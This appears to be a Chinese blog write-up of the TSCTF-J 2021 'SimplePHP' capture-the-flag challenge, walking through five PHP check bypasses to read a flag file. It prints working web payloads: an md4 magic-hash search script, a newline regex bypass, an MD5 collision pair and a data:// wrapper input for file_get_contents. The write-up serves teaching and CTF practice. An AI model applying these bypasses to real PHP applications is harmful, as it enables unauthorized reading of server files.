TSCTF-J 2021 [SimplePHP]

最新推荐文章于 2023-04-01 21:08:34 发布
最新推荐文章于 2023-04-01 21:08:34 发布
阅读量217 收藏 1
点赞数 1
分类专栏: TSCTF-J 文章标签: 1024程序员节 php 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Ivyyyyyy1/article/details/120934651
版权

一、题目

 

 进来看到的代码如下:

<?php
highlight_file(__FILE__);
if ($_GET["secret"] != hash("md4", $_GET["secret"])) {
    die('乐<br>');
}

if (!preg_match('/http/i', $_GET['file'])) {
    if (preg_match('/^i_am_bloodhound$/', $_GET['name']) && $_GET['name'] !== 'i_am_bloodhound') {
        $file = $_GET["file"];
        echo "我是布洛特亨德尔!<br>";
    }
} else {
    die("?");
}

if ((string)$_GET['s1'] !== (string)$_GET['s2'] && md5($_GET['s1']) === md5($_GET['s2'])) {
    echo "众神之父赐予我视野<br>";
} else {
    die("众神之父赐予我重伤倒地<br>");
}

if ($_REQUEST) {
    foreach ($_REQUEST as $value) {
        if (preg_match('/[a-zA-Z]/i', $value))
            die('众神之父不喜欢英文<br>');
    }
}

if (file_get_contents($file) !== 'phoniex_kit') {
    die("我重伤倒地");
}

var_dump(file_get_contents("/flag"));

 这里可以看到有五个if判断,那么就一层一层地绕过罢

二、解题

第一层:

if ($_GET["secret"] != hash("md4", $_GET["secret"]))

 这里要求我们传入的$secret的值等于经过md4的hash之后的值,那显然输入一般的字符串不可能

0e开头的字符串在参与比较时,会被当做科学计数法,结果转换为0

那么我们传入的secret以0e开头,后面跟数字,且经md4后开头仍然是0e的就满足条件

脚本如下:

<?php
for($a=1;$a<=1000000000;$a++){
    $b='0e'.$a;
    $c=(substr(hash("md4",$b),2));//取后面满足数字
    $d=(substr(hash("md4",$b),0,true).substr(hash("md4",$b),1,true));//取前面满足是0e
    if($d==='0e'){
        if(ctype_digit($c)){//is_numeric()函数是有漏洞。用ctype_digit();
                echo $b."success";
                break;
        }else{
            echo "fail";
        }
    }
}

参考:https://blog.csdn.net/qq_46091464/article/details/108190466

 输出的0e251288019刚好满足

get传入后绕过成功

第二层:

if (!preg_match('/http/i', $_GET['file'])) {
   if (preg_match('/^i_am_bloodhound$/', $_GET['name']) && $_GET['name'] !==         
        'i_am_bloodhound') {

 preg_match检测不了数组,所以直接传file[]就能绕过

而/^字符串$/这种类型的,无法检测句末的换行符,编码后即 %0a

name=i_am_bloodhound%0a

第三层:

if ((string)$_GET['s1'] !== (string)$_GET['s2'] && md5($_GET['s1']) === md5($_GET['s2']))

这是这个题最难的地方,强类型绕过

s1=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2
&s2=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2

可以参考安洵杯19年的那个题,应该是MD5碰撞了

第四层:

if ($_REQUEST)

$_REQUEST变量能获得GET或者POST的参数,而如果通过不同的方式获得相同变量的不同值,只会获得最后传入的值,这里我们可以把GET里传的参再用POST传一遍,覆盖掉

 第五层:

if (file_get_contents($file) !== 'phoniex_kit')

 看到file_get_contents了,直接用伪协议绕过即可

file=data://text/plain,%70%68%6f%6e%69%65%78%5f%6b%69%74

拿到flag 

1vyyyyyy
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
simplePHP Scripts-开源
05-01
simplePHP脚本允许您使用不带数据库的常见php脚本,使用.dat和.txt文件存储数据。
java企业oa源码-SimplePHP:简洁明了PHP框架,全面支持php5.3+
06-05
当前状态: 这是一个简单明了的框架,专为 ...设计,具有完整的 OOP 支持。 ... 但是几乎所有的 ...兼容,所以我不能使用命名空间来管理类(实际上命名空间在这些框架中没有用)。...因此,我决定编写一个新框架来满足我的需求。...
【超全总结】CTF常见的MD5绕过漏洞和应对方法
M0nH1N的博客
08-06 5357
$str1 = $_GET['str1'];$str2 = $_GET['str2'];if (md5($str1) == md5($str2)){die('OK'); } php弱类型比较产生的漏洞 想要满足这个判断只需要构造出MD5值为0e开头的字符串,这样的话弱类型比较会认为是科学技术法,0的多少次方都是0,因此可以绕过 有一些字符串的MD5值为0e开头,这里记录一下 QNKCDZO 240610708 s878926199a s155964671a s2145
php语言特性
weixin_63231007的博客
04-15 1899
<1>弱类型比较 我们来看下面一道题: if($_GET['a']!=$_GET['b'] && md5($_GET['a'])==md5($_GET['b'])){ ehco flag; } 如何才能满足这样的if判断条件呢?需要使两个变量不相等而md5值相等。这样的思路可以通过MD5碰撞来解决。让我们思路回到php语言,==存在弱类型比较,而md5函数返回值是一个32位的字符串,如果字符串以"0e"开头的话,类型转换机制会将它识别为一个科学计数法表
利用 pearcmd.php 实现 Getshell
1tachi的博客
01-12 612
文章目录源码分析利用Pearcmd.php 学习连接:西湖论剑的一道Web 源码 <?php highlight_file(__FILE__); if(isset($_GET['check'])){ if(file_get_contents($_GET['check']) === "LFI"){ @include($_GET['a']); }else{ die("no!"); } } 分析 信息搜集了一圈,啥也没有,也就是说不知
CTF中常见php-MD5()函数漏洞
热门推荐
等风来
10-11 2万+
CTF中常见php-MD5()函数漏洞 1.数字与字符串之间的比较 var_dump( 0 == "a" ); var_dump( "0" == "a" ); 第一个返回的是 true ,第二个返回的是 false 因为php把字母开头的转化为整型时,转化为0, 前面数字后面字母的话就只取到第一个字母出现的位置之前(如intval(’'123abd45gf)结果为123) 2.MD5函数漏洞 $...
php-MD5()函数漏洞
qq_42250840的博客
02-26 491
一、数字与字符串之间的比较 var_dump( 0 == "a" ); true var_dump( "0" == "a" );false php把字母开头的字符串转化为整型时,转化为0, 前面数字后面字母的话就只取到第一个字母出现的位置之前的数字。 二、MD5函数漏洞 $_GET['name'] != $_GET['password'] MD5($_GET['name']) == MD5($_...
simplePHP-curl:源自 Codeigniter-cURL 的 Simpe PHP cURL 库
06-13
您可以使用更好、经过充分测试和开发的 cURL 库。...简单调用这些都在一行代码中完成,让生活变得轻松。 他们返回页面的正文,或者在失败时返回 FALSE。...// Simple call to CI URI$curl->simple_post('controller/method...
simplePHP轻量级
01-21
simplePHP PHP轻量级框架
simplephp:使一切变得简单
02-14
simplephp:使一切变得简单
HECTF_2020 部分Writeup
Dream的博客
11-27 548
HECTF_2020 web1 打开题目发现要手机号登入,F12查看源码发现有个手机号<-- 15970773575 -->;尝试找回密码,根据hint.php给的提示发现,验证码是要通过爆破得来,且长度为4位; 使用脚本生成字典 dz.py: f=open('zidian.txt','w') for i in range(9999): s=str(i) if len(s)==1: s="000"+s if len(s)==2: s="0.
NKCTF-easy_php
Keepb1ue的博客
04-01 2492
第一个弱比较绕过,可以通过magic hash 0e开头或者数组绕过。这个是考php非法传参问题。套娃题,需要绕五个过滤。
PHP中的MD5()函数漏洞
John_lain的博客
10-28 3575
文章目录1. MD5函数漏洞2.PHP特性3.MD5碰撞 1. MD5函数漏洞 $_GET['a'] != $_GET['b'] &amp;&amp; MD5($_GET['a']) == MD5($_GET['b']) 要让上面的等式成立,a和b的值不能相等,但是md5后的值相等。因为是==比较,只判断值是否相等,不判断类型是否相同。如果类型不同先转换为相同类型再进行比较而PHP在处理哈希字...
md5强弱碰撞(HECTF ezphp)
qq_47168481的博客
10-31 1609
很惭愧,学了这么久才领会到md5碰撞 参考网站:浅谈md5碰撞 直接上题目 <?php error_reporting(0); highlight_file(__file__); include('flag.php'); $string_1 = $_GET['str1']; $string_2 = $_GET['str2']; if($_GET['param1']!==$_GET['param2']&&md5($_GET['param1'])===md5($_GET['par
MD5绕过
qq_63267612的博客
07-03 675
1.0e绕过 弱比较会把0exxxx当做科学计数法,不管后面的值为任何东西,0的任何次幂都为0 要求get获取的a和b的值要求不相等,但要求其md值相同2. 数组绕过 md5()函数计算的是一个字符串的哈希值,对于数组则返回false 传入 可以看到,MD5一个数组返回了null,null==null,成功绕过 3. 强类型绕过 因为强类型比较,不仅比较值,还比较类型,0e会被当做字符串,所以不能用0e来进行 但是可以用MD值完全相同的字符来进行绕过 上面的方法都不能用了,百度发现是强类型绕过 payloa
[BJDCTF2020]Easy MD5 解题思路&过程
NickWilde233的随笔
09-11 984
[BJDCTF2020]Easy MD5解题思路&过程
PHP函数漏洞总结
柠檬木有枝
08-26 2396
前言 本文主要针对 PHP 函数相关的漏洞的总结,可能会偏向 CTF 方面,内容肯定不全,有空的话会持续更新,欢迎各位表哥补充以及对文章错误之处进行斧正! 1 弱类型安全问题 1.1 == 弱类型比较缺陷 === 在进行比较的时候,会先判断两种字符串的类型是否相等,再比较 == 在进行比较的时候,会先将字符串类型转化成相同,再比较 (1)字符串的开始部分决定了它的值,如果该字符串以合法的数值开始,则使用该数值,否则其值则为0 var_dump("admin"==0); //true var_dump("1a
TSCTF-J 2019 bypass
西部壮仔的博客
04-01 739
题目: <?php highlight_file(__FILE__); if(md5($_GET['pass']) == md5($_GET['username']) && $_GET['pass'] != $_GET['username']){ if(strpos($_GET['username'],"tsctf") === 0){ ...
第五届TSCTF-RE部分题解
WocW的博客
05-13 836
前言 这个周末参加了一下北邮的TSCTF,可以明确感觉到自己目前缺的是处理数据的工具或者是更高的技巧,许许多多的知识待补!有幸认识了在北邮读研的直系学长,也算是一些收获。 RE1 Checkin 分析 elf文件,IDA观察查看程序很简单。没仔细看,先上动调看看。 这里处理的第一步首先循环右移数据 ror flag[x],x 然后是直接进行已知字符对比验证。 exp a=[0x54,0xa9 ...
[SWPUCTF 2018]SimplePHP
最新发布
07-28
回答: \[1\]中的代码片段是一个PHP代码示例,其中定义了三个类C1e4r、Show和Test,并创建了相应的对象。\[2\]中的代码片段是一个PHP文件,它包含了一些文件操作和类的实例化。\[3\]中的代码片段是一个POC(Proof of Concept)示例,用于演示一个可能的漏洞利用场景。根据提供的信息,这个问题可能是关于SWPUCTF 2018比赛中的一个题目,题目名称为"SimplePHP"。然而,由于提供的引用内容不完整,无法给出更具体的答案。如果您有关于这个问题的更多信息,请提供更多的上下文,以便我能够更好地回答您的问题。 #### 引用[.reference_title] - *1* [[SWPUCTF 2018]SimplePHP_wp](https://blog.csdn.net/lzu_lfl/article/details/127802053)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [[SWPUCTF 2018]SimplePHP](https://blog.csdn.net/shinygod/article/details/124002143)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [[SWPUCTF 2018]SimplePHP--一道简单的Phar反序列化题目](https://blog.csdn.net/qq_41401434/article/details/125323752)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值